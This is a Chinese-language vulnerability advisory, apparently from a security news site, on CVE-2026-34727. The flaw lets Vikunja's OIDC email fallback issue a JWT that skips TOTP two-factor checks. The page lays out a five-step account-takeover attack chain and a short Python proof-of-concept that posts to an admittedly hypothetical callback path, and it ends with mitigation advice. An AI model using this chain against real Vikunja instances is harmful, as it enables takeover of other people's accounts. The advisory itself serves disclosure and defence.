CVE-2026-34727 CVSS 7.4 高危

CVE-2026-34727 Vikunja OIDC认证绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34727

漏洞类型

认证绕过

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Vikunja

漏洞概述

Vikunja是一款开源自托管任务管理平台。在2.3.0版本之前，其OIDC回调处理程序存在逻辑缺陷。当系统通过OIDC邮箱回退机制匹配到已启用TOTP双因素认证的本地用户时，会直接签发完整的JWT令牌，完全跳过第二因素验证。这使得攻击者可以在不知晓TOTP验证码的情况下绕过2FA登录账户。该漏洞已在2.3.0版本中修复。

技术细节

该漏洞的核心在于Vikunja处理OIDC回调时的认证逻辑缺陷。正常流程中，若用户启用了TOTP双因素认证，即使通过OIDC进行身份认证，系统也应在签发最终令牌前要求输入TOTP验证码。然而，在受影响版本中，OIDC回调处理程序仅验证了OIDC提供商的身份，并未检查匹配到的本地用户是否开启了TOTP。攻击者只需控制一个与目标Vikunja用户相同邮箱的OIDC账号，即可利用邮箱回退机制触发登录流程。由于系统缺失了TOTP校验步骤，攻击者将直接获得具有完整权限的JWT令牌，从而绕过双因素认证保护，完全接管用户账户。

攻击链分析

STEP 1

侦察

识别使用Vikunja且配置了OIDC登录的目标系统，并确认系统中存在已启用TOTP的用户。

STEP 2

账号准备

攻击者在OIDC提供商（如Google, GitHub等）处注册或控制一个与目标Vikunja用户相同的邮箱账号。

STEP 3

发起认证

攻击者通过Vikunja的OIDC登录入口发起登录请求，并使用控制好的OIDC账号完成提供商端的认证。

STEP 4

绕过验证

Vikunja接收OIDC回调，通过邮箱匹配到本地用户。由于漏洞存在，系统未检查TOTP状态，直接签发JWT令牌。

STEP 5

获取权限

攻击者利用获取到的JWT令牌访问Vikunja API，完全接管用户账户，窃取数据或进行恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-34727
# This script demonstrates the logic flaw where TOTP is skipped during OIDC callback.

import requests

def exploit_oidc_bypass(target_url, oidc_token):
    """
    Simulates the OIDC callback request.
    In a real scenario, the attacker would obtain a valid OIDC token for the victim's email.
    The vulnerable endpoint issues a JWT without checking TOTP status.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {oidc_token}"
    }
    
    # The vulnerable endpoint (hypothetical path based on description)
    endpoint = f"{target_url}/api/v1/auth/oidc/callback"
    
    try:
        response = requests.post(endpoint, headers=headers)
        if response.status_code == 200 and "token" in response.json():
            print("[+] Exploit successful! TOTP bypassed.")
            print(f"[+] Received JWT: {response.json()['token']}")
        else:
            print("[-] Exploit failed or patched.")
    except Exception as e:
        print(f"Error: {e}")

# Usage
# exploit_oidc_bypass("http://target-vikunja.com", "fake_oidc_token")

影响范围

Vikunja < 2.3.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用OIDC登录功能，强制用户仅使用本地账号加2FA的方式登录，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表